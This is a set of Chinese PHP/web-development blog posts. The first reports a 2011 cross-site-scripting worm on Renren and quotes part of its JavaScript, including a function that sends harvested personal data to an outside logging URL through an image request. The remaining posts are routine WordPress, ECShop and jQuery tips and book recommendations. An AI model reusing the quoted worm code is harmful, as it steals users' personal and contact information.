yangzhe1991 写道 "4月29日晚，大量人人网用户收到一个标题为《有人暗恋你哦，你想知道TA是谁么》的站内信，用户发现若打开此站内信将会自动将此站内信内容发给所有好友。通过查看站内信网页源码，发现其中有一行代码为<script src='http://qiutuan.net/2011/51.js'>。显然，一个稍微有点网站编程常识的人都知道“<>”一类标签符号在显示的时候需要转义为普通文本防止浏览器执行，但人人网的转化方式为在用户发送端转化，若绕过此机制直接发送（如此js脚本中直接post站内信内容）则文本中包含的HTML均可被正常执行…… 显然作者的意图并非只是恶作剧，通过查看连混淆都懒得做的代码，我们可以很清楚的看到其主要目的是收集用户的人人id、学校、生日、姓名、qq、msn、手机，并且通过一个伟大的功能——通讯录，还可以得到所有好友名片中的上述信息……全部信息会发送到http://qiutuan.net/2011/log.php 由于此站内信的传播之广泛，目前只知道此域名几乎是针对性的使用并且托管在美国，唯一能稍微解决此问题的方法是所有会写代码的人都写一个脚本随机生成数据去稀释被上传的数据，当然要在其收手前做完。 " 要知道，人人网的隐私保护做的一直没有山寨它的某网站好。 珍爱生命，远离淫淫。 另外报道，今天晚上，所有有关该问题的报道均被删除 ，包括solidot.org，看来人人公关能力很强，我倒是要看看，人人啥时候能公关到我这来   另外 附上本次事件的关键代码： var token = XN.get_check; var mobile_friends = []; var all_friends = [];   var my_id = 0;   function send_data(v) { var img = document.createElement('img'); img.src = 'http://qiutuan.net/2011/log.php?' + v; document.body.appendChild(img); document.body.removeChild(img); }   function send_to_friends(){ var i; var idlist = [...]

公司有几个wordpress搭建的文章网站，每次有新用户注册的时候就会发邮件提醒我，由于我的手机实时接受邮件，所以晚上都被吵死，今天就来对wordpress动手术 打开 wp-includes/pluggable.php 文件 大约 1200行，找到 @wp_mail(get_option('admin_email'), sprintf(__('[%s] New User Registration'), $blogname), $message); 注释之，保存 OK，世界清净了

想给每个分类有个图片，网上找了教程，肯定不能成功，现在把成功的方法写出来，供大家参考 数据库 category表 添加一个字段 cat_img ，类型设置 varchar 打开 admin/templates/category_info.htm 找个地方添加下面代码 分类图片: <input name="cat_img" size="35" type="file" /> {if $cat_info.cat_img}<img src="images/yes.gif" border="0" alt="" />{else}<img src="images/no.gif" alt="" />{/if} 打开 admin/category.php 找到 require(dirname(__FILE__) . '/includes/init.php'); 下面添加 include_once(ROOT_PATH . '/includes/cls_image.php'); 找到 $cat['cat_recommend'] = !empty($_POST['cat_recommend']) ? $_POST['cat_recommend'] : array(); 全文共2处，两处下面都添加 $cat['cat_img'] = $image-&gt;upload_image($_FILES['cat_img']); 保存，ok了 以下为7月18日更新 上面所述这样做，会有一个问题，添加了分类图片，如果再编辑了分类而没有上传图片，那么图片会被清除，所以做如下修正 将下面这句 $cat['cat_img'] = $image->upload_image($_FILES['cat_img']); 改成 [...]

首先声明，本文有一定的广告性质，因为本站没有任何收入来源，所以为了生存，没办法，必须打广告，请大家谅解，但是，本文中推荐的书籍确实都是不错的，我已经全部看过了，不好的我不会推荐，就供大家参考了 第一本：杜江老师写的 PHP 5与 MySQL 5  Web 开发技术详解 这本书呢，介绍了很多杜江老师从事PHP开发过程中的经验，写的也很详细，推荐阅读 第二本：大道PHP：LAMP+Zend+开源框架整合开发与实战 这本书呢，比较适合初学者，但是感觉这么厚厚一本，内容挺少，如果你是初学者，一定不要错过 第三本：JavaScript 实 例自学手册：通过486个例子掌握Web开发捷径 学PHP当然是要做网页，要做出精彩的网页，就离不开Javascript 本书自带将近500个js实例，但是讲解不详细，适合需要快速开发的朋友拿来复制粘贴用 第四本：PHP网络编程典型模块与实例精讲 同上，适合复制粘贴用 第五本：PHP函数库查询辞典 中文版的，20多块，不贵，适合需要经常背诵函数的童鞋购买 第六本：HTML&XHTML权威指南（第六版） 搞PHP当然要会弄页面，本书适合对HTML XHTML生疏，还有 HTML和XHTML功底不扎实的童鞋 第七本：Ajax与PHP基础教程 Ajax与PHPWeb开发 两本放一起了，因为这两本感觉内容差不多，都是翻译老外的 第八本：jQuery基础教程 jQuery实战 锋利的jQuery 这次3本放一起了，但这三本却是截然不同的三本，JQuery确实是个好东西，它是一个强大的JS库，能为你节省很多编码时间，并且适合对JS不精通的人，使用 JQuery你能完成你觉得自己不可能完成的事情，个人比较推荐后者 第九本：Photoshop CS 平面视觉特效设计精粹(附光盘全彩印刷)/CG设计与制作精粹系列 做网页当然离不开美工，虽然我们不是专业美工，但是还是要学一点图片处理基础，本书中包含很多的例子，讲解的也比较详细

今天把修改好的最终的源码放出来，该程序使用了强大的Snoopy类 下面是下载链接 2009年3月6日更新: 由于99sushe在查询页面加了验证码，所以做一下版本升级 点我下载 由于需要一个Snoopy类，一起打包比较麻烦，这里就不打包了，请大家自行从旧版本提取，或者到这里下载 ===================== 下面是先前旧版本不带验证码的 点我下载

官方成绩，没有广告，无需等待15秒 点此进入

一个是Snoopy类，可以模拟浏览器行为 一个是simplehtmldom类，可以解析HTML等xml文件 点击下载

[2010年2月1日更新] /apps/phpchina.php您可以在这里即时查看最新邀请码

jqUploader是一款十分好用的jQuery Flash 上传插件，但是无法工作在1.3.2版本下，是一个十分糟糕的问题，今天就给它动动手术 打开 jquery.jqUploader.js 找到 var $thisInput = $("input[@type='file']",$this); 改成 var $thisInput = $("input [type='file']",$this); 找到 var maxFileSize = $("input[@name='MAX_FILE_SIZE']", $(this.form)).val(); 改成 var maxFileSize = $("input [name='MAX_FILE_SIZE']", $(this.form)).val(); 找到 afterScript: getstaffatt(), 注释之 找到 $("*[@type='submit']",this.form).hide(); 改成 $("* [type='submit']",this.form).hide(); 保存一下，在用jQuery-1.3.2测试，已经成功了 总结一下，jQuery最新版里面已经没有了类似于[@type='XXX']这样的写法了，需要把@去掉，当然，还要在 "input" 后面加一个空格，这才是jQuery过滤器的正确写法

不知道Firefox是出于安全考虑还是有Bug，使用Flash请求页面的时候Cookies和SESSION都不会传递，上网查一下，很多教程都说是把php.ini中的 session.use_trans_sid设置为1，但是我不明白这是什么意思，所以不敢轻易修改，免得带来安全问题，而且如果是虚拟主机用户要不是没办法修改了？ 所以要想别的解决方法，从程序上解决问题，看到一位牛人的Blog（竟然禁止了IE访问他的Blog，不知道要损失多少访问量，嘎嘎），他的方法是在flash的URL后面加参数，把sid传递给flash，然后在flash里面把sid从flash里面传递给页面，但是他也没说清楚在页面里怎么处理传递过去的sid，因为我是用的jqUploader插件，所以没必要这么麻烦，况且我对flash也不熟悉，万一改坏了那不彻底完蛋了。 下面是我的解决方法 首先通过php的session_id()函数把sid从url参数传递过去，然后从$_GET数组获取sid，然后在接收页面使用session_id($sid)重新设置sid的值，具体代码如下